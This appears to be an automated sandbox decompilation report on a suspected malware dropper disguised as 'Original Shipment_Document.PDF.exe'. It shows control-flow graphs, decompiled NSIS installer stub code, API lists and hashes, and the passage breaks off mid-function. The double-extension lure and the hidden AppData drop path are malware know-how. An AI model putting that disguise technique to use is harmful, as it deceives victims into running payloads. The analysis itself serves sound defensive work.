                                                control_flow_graph 301 403bb6-403bce call 4068d4 304 403bd0-403bdb GetUserDefaultUILanguage call 40644e 301->304 305 403be2-403c19 call 4063d5 301->305 308 403be0 304->308 311 403c31-403c37 lstrcatW 305->311 312 403c1b-403c2c call 4063d5 305->312 310 403c3c-403c65 call 403e8c call 405ede 308->310 318 403cf7-403cff call 405ede 310->318 319 403c6b-403c70 310->319 311->310 312->311 325 403d01-403d08 call 406544 318->325 326 403d0d-403d32 LoadImageW 318->326 319->318 320 403c76-403c9e call 4063d5 319->320 320->318 327 403ca0-403ca4 320->327 325->326 329 403db3-403dbb call 40140b 326->329 330 403d34-403d64 RegisterClassW 326->330 331 403cb6-403cc2 lstrlenW 327->331 332 403ca6-403cb3 call 405e03 327->332 344 403dc5-403dd0 call 403e8c 329->344 345 403dbd-403dc0 329->345 333 403e82 330->333 334 403d6a-403dae SystemParametersInfoW CreateWindowExW 330->334 338 403cc4-403cd2 lstrcmpiW 331->338 339 403cea-403cf2 call 405dd6 call 406507 331->339 332->331 337 403e84-403e8b 333->337 334->329 338->339 343 403cd4-403cde GetFileAttributesW 338->343 339->318 348 403ce0-403ce2 343->348 349 403ce4-403ce5 call 405e22 343->349 353 403dd6-403df0 ShowWindow call 406864 344->353 354 403e59-403e5a call 40563c 344->354 345->337 348->339 348->349 349->339 361 403df2-403df7 call 406864 353->361 362 403dfc-403e0e GetClassInfoW 353->362 357 403e5f-403e61 354->357 359 403e63-403e69 357->359 360 403e7b-403e7d call 40140b 357->360 359->345 363 403e6f-403e76 call 40140b 359->363 360->333 361->362 366 403e10-403e20 GetClassInfoW RegisterClassW 362->366 367 403e26-403e49 DialogBoxParamW call 40140b 362->367 363->345 366->367 371 403e4e-403e57 call 403b06 367->371 371->337
                                                C-Code - Quality: 96%
                                                			E00403BB6(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a230;
				_t22 = E004068D4(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423708;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
					__eflags =  *0x423708;
					if(__eflags == 0) {
						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E0040644E(L"1033", _t73 & 0x0000ffff);
				}
				E00403E8C(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen";
				 *0x42a2a0 =  *0x42a238 & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405EDE(_t90, L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen") != 0) {
					L16:
					if(E00405EDE(_t98, _t86) == 0) {
						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429208 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E8C(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E0040563C(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291ec;
								if( *0x4291ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236e8, 5); // executed
							_t39 = E00406864("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406864("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291c0);
								 *0x4291e4 = _t87;
								RegisterClassW(0x4291c0);
							}
							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
							E00403B06(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a220;
						 *0x4291c4 = E00401000;
						 *0x4291d0 =  *0x42a220;
						 *0x4291d4 = _t30;
						 *0x4291e4 = 0x40a380;
						if(RegisterClassW(0x4291c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281c0;
					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
					_t63 =  *0x4281c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281c2;
						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406507(_t86, E00405DD6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E22(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                0x00403bbc
                                                0x00403bc5
                                                0x00403bcc
                                                0x00403bce
                                                0x00403be2
                                                0x00403bf4
                                                0x00403bfd
                                                0x00403c06
                                                0x00403c0d
                                                0x00403c12
                                                0x00403c19
                                                0x00403c2c
                                                0x00403c2c
                                                0x00403c37
                                                0x00403bd0
                                                0x00403bd0
                                                0x00403bdb
                                                0x00403bdb
                                                0x00403c3c
                                                0x00403c46
                                                0x00403c4f
                                                0x00403c54
                                                0x00403c65
                                                0x00403cf7
                                                0x00403cff
                                                0x00403d08
                                                0x00403d08
                                                0x00403d1e
                                                0x00403d24
                                                0x00403d32
                                                0x00403db3
                                                0x00403dbb
                                                0x00403dc5
                                                0x00403dca
                                                0x00403dd0
                                                0x00403e5a
                                                0x00403e5f
                                                0x00403e61
                                                0x00403e7d
                                                0x00000000
                                                0x00403e7d
                                                0x00403e63
                                                0x00403e69
                                                0x00403e71
                                                0x00403e71
                                                0x00000000
                                                0x00403e69
                                                0x00403dde
                                                0x00403de9
                                                0x00403dee
                                                0x00403df0
                                                0x00403df7
                                                0x00403df7
                                                0x00403e02
                                                0x00403e0a
                                                0x00403e0c
                                                0x00403e0e
                                                0x00403e17
                                                0x00403e1a
                                                0x00403e20
                                                0x00403e20
                                                0x00403e3f
                                                0x00403e50
                                                0x00000000
                                                0x00403e55
                                                0x00403dbd
                                                0x00403dbf
                                                0x00000000
                                                0x00403d34
                                                0x00403d34
                                                0x00403d40
                                                0x00403d4a
                                                0x00403d50
                                                0x00403d55
                                                0x00403d64
                                                0x00403e82
                                                0x00403e82
                                                0x00000000
                                                0x00403e82
                                                0x00403d73
                                                0x00403dae
                                                0x00000000
                                                0x00403dae
                                                0x00403c6b
                                                0x00403c6b
                                                0x00403c6e
                                                0x00403c70
                                                0x00000000
                                                0x00000000
                                                0x00403c7e
                                                0x00403c90
                                                0x00403c95
                                                0x00403c9e
                                                0x00000000
                                                0x00000000
                                                0x00403ca4
                                                0x00403ca6
                                                0x00403cb3
                                                0x00403cb3
                                                0x00403cbc
                                                0x00403cc2
                                                0x00403cea
                                                0x00403cf2
                                                0x00000000
                                                0x00403cd4
                                                0x00403cd5
                                                0x00403cde
                                                0x00403ce4
                                                0x00403ce5
                                                0x00000000
                                                0x00403ce5
                                                0x00403ce0
                                                0x00403ce2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ce2
                                                0x00403cc2

                                                APIs
                                                  • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                  • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0
                                                  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                • lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,7620FAA0), ref: 00403CB7
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CD5
                                                • LoadImageW.USER32 ref: 00403D1E
                                                • RegisterClassW.USER32 ref: 00403D5B
                                                • SystemParametersInfoW.USER32 ref: 00403D73
                                                • CreateWindowExW.USER32 ref: 00403DA8
                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                                • GetClassInfoW.USER32 ref: 00403E0A
                                                • GetClassInfoW.USER32 ref: 00403E17
                                                • RegisterClassW.USER32 ref: 00403E20
                                                • DialogBoxParamW.USER32 ref: 00403E3F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 606308-3196991547
                                                • Opcode ID: e27dd36c7e3ea7d4b0518f1200331748326bb14958ad4778a213b023eb595640
                                                • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                                • Opcode Fuzzy Hash: e27dd36c7e3ea7d4b0518f1200331748326bb14958ad4778a213b023eb595640
                                                • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 377 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 374->377 378 4030cd-4030d2 374->378 386 4031f0-4031fe call 403019 377->386 387 40310b 377->387 379 4032ad-4032b1 378->379 393 403200-403203 386->393 394 403253-403258 386->394 389 403110-403127 387->389 391 403129 389->391 392 40312b-403134 call 403499 389->392 391->392 401 40325a-403262 call 403019 392->401 402 40313a-403141 392->402 396 403205-40321d call 4034af call 403499 393->396 397 403227-403251 GlobalAlloc call 4034af call 4032b4 393->397 394->379 396->394 425 40321f-403225 396->425 397->394 423 403264-403275 397->423 401->394 403 403143-403157 call 405fb2 402->403 404 4031bd-4031c1 402->404 412 4031cb-4031d1 403->412 421 403159-403160 403->421 411 4031c3-4031ca call 403019 404->411 404->412 411->412 414 4031e0-4031e8 412->414 415 4031d3-4031dd call 4069c1 412->415 414->389 422 4031ee 414->422 415->414 421->412 427 403162-403169 421->427 422->386 428 403277 423->428 429 40327d-403282 423->429 425->394 425->397 427->412 430 40316b-403172 427->430 428->429 431 403283-403289 429->431 430->412 432 403174-40317b 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fb2 431->433 432->412 434 40317d-40319d 432->434 437 4032ab 433->437 434->394 436 4031a3-4031a7 434->436 438 4031a9-4031ad 436->438 439 4031af-4031b7 436->439 437->379 438->422 438->439 439->412 440 4031b9-4031bb 439->440 440->412
                                                C-Code - Quality: 80%
                                                			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe";
				 *0x42a22c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe", 0x400);
				_t89 = E00405FF7(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\hardz\\Desktop";
				E00406507(L"C:\\Users\\hardz\\Desktop", _t91);
				E00406507(0x439000, E00405E22(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x420ec4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x42a234 - _t82;
					if( *0x42a234 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x403847
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034AF( *0x42a234 + 0x1c);
						_t35 =  &_v24; // 0x403847
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42a230 = _t94;
							 *0x42a238 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a23c =  *0x42a23c + 1;
								__eflags =  *0x42a23c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FB2(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034AF( *0x414eb8);
					_t65 = E00403499( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403499(0x40ceb8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a234;
						if( *0x42a234 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FB2( &_v44, 0x40ceb8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414eb8; // 0x52fa6
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a234 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x420ec4; // 0x536c0
						if(__eflags < 0) {
							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
						}
						 *0x414eb8 =  *0x414eb8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                0x00403085
                                                0x00403088
                                                0x0040308b
                                                0x0040308e
                                                0x00403094
                                                0x004030a5
                                                0x004030aa
                                                0x004030bd
                                                0x004030c2
                                                0x004030c5
                                                0x004030cb
                                                0x00000000
                                                0x004030cd
                                                0x004030d8
                                                0x004030de
                                                0x004030ef
                                                0x004030f6
                                                0x004030fc
                                                0x004030fe
                                                0x00403103
                                                0x00403105
                                                0x004031f0
                                                0x004031f2
                                                0x004031f7
                                                0x004031fe
                                                0x00000000
                                                0x00000000
                                                0x00403200
                                                0x00403203
                                                0x00403227
                                                0x00403227
                                                0x0040322c
                                                0x00403232
                                                0x0040323d
                                                0x00403242
                                                0x00403242
                                                0x00403245
                                                0x00403246
                                                0x00403247
                                                0x00403249
                                                0x0040324e
                                                0x00403251
                                                0x00403264
                                                0x00403268
                                                0x00403270
                                                0x00403275
                                                0x00403277
                                                0x00403277
                                                0x00403277
                                                0x0040327f
                                                0x0040327f
                                                0x00403282
                                                0x00403283
                                                0x00403283
                                                0x00403286
                                                0x00403288
                                                0x00403288
                                                0x00403288
                                                0x00403292
                                                0x00403298
                                                0x004032a6
                                                0x004032ab
                                                0x00000000
                                                0x004032ab
                                                0x00000000
                                                0x00403251
                                                0x0040320b
                                                0x00403216
                                                0x0040321b
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00403222
                                                0x00403225
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040310b
                                                0x00403110
                                                0x00403115
                                                0x00403119
                                                0x00403120
                                                0x00403125
                                                0x00403127
                                                0x00403129
                                                0x00403129
                                                0x0040312d
                                                0x00403132
                                                0x00403134
                                                0x0040325c
                                                0x00403253
                                                0x00000000
                                                0x00403253
                                                0x0040313a
                                                0x00403141
                                                0x004031bd
                                                0x004031c1
                                                0x004031c5
                                                0x004031ca
                                                0x00000000
                                                0x004031c1
                                                0x0040314a
                                                0x0040314f
                                                0x00403152
                                                0x00403157
                                                0x00000000
                                                0x00000000
                                                0x00403159
                                                0x00403160
                                                0x00000000
                                                0x00000000
                                                0x00403162
                                                0x00403169
                                                0x00000000
                                                0x00000000
                                                0x0040316b
                                                0x00403172
                                                0x00000000
                                                0x00000000
                                                0x00403174
                                                0x0040317b
                                                0x00000000
                                                0x00000000
                                                0x0040317d
                                                0x00403183
                                                0x0040318c
                                                0x00403192
                                                0x00403195
                                                0x00403197
                                                0x0040319d
                                                0x00000000
                                                0x00000000
                                                0x004031a3
                                                0x004031a7
                                                0x004031af
                                                0x004031af
                                                0x004031b2
                                                0x004031b5
                                                0x004031b7
                                                0x004031b9
                                                0x004031b9
                                                0x00000000
                                                0x004031b7
                                                0x004031a9
                                                0x004031ad
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031cb
                                                0x004031cb
                                                0x004031d1
                                                0x004031dd
                                                0x004031dd
                                                0x004031e0
                                                0x004031e6
                                                0x004031e6
                                                0x004031e6
                                                0x004031ee
                                                0x004031ee
                                                0x00000000
                                                0x004031ee

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                                                  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                                • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Original Shipment_Document.PDF.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-2676002034
                                                • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                                • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 662 406544-40654f 663 406551-406560 662->663 664 406562-406578 662->664 663->664 665 406590-406599 664->665 666 40657a-406587 664->666 668 406774-40677f 665->668 669 40659f 665->669 666->665 667 406589-40658c 666->667 667->665 671 406781-406785 call 406507 668->671 672 40678a-40678b 668->672 670 4065a4-4065b1 669->670 670->668 673 4065b7-4065c0 670->673 671->672 675 406752 673->675 676 4065c6-406603 673->676 677 406760-406763 675->677 678 406754-40675e 675->678 679 4066f6-4066fb 676->679 680 406609-406610 676->680 681 406765-40676e 677->681 678->681 682 4066fd-406703 679->682 683 40672e-406733 679->683 684 406612-406614 680->684 685 406615-406617 680->685 681->668 686 4065a1 681->686 687 406713-40671f call 406507 682->687 688 406705-406711 call 40644e 682->688 691 406742-406750 lstrlenW 683->691 692 406735-40673d call 406544 683->692 684->685 689 406654-406657 685->689 690 406619-406640 call 4063d5 685->690 686->670 703 406724-40672a 687->703 688->703 694 406667-40666a 689->694 695 406659-406665 GetSystemDirectoryW 689->695 705 4066dd-4066e1 690->705 707 406646-40664f call 406544 690->707 691->681 692->691 700 4066d3-4066d5 694->700 701 40666c-40667a GetWindowsDirectoryW 694->701 699 4066d7-4066db 695->699 699->705 706 4066ee-4066f4 call 40678e 699->706 700->699 709 40667c-406684 700->709 701->700 703->691 708 40672c 703->708 705->706 710 4066e3-4066e9 lstrcatW 705->710 706->691 707->699 708->706 713 406686-40668f 709->713 714 40669b-4066b1 SHGetSpecialFolderLocation 709->714 710->706 719 406697-406699 713->719 717 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 714->717 718 4066cf 714->718 717->699 717->718 718->700 719->699 719->714
                                                C-Code - Quality: 72%
                                                			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a258 + _t44 * 2;
				_t45 = 0x4281c0;
				_t108 = 0x4281c0;
				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406507(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
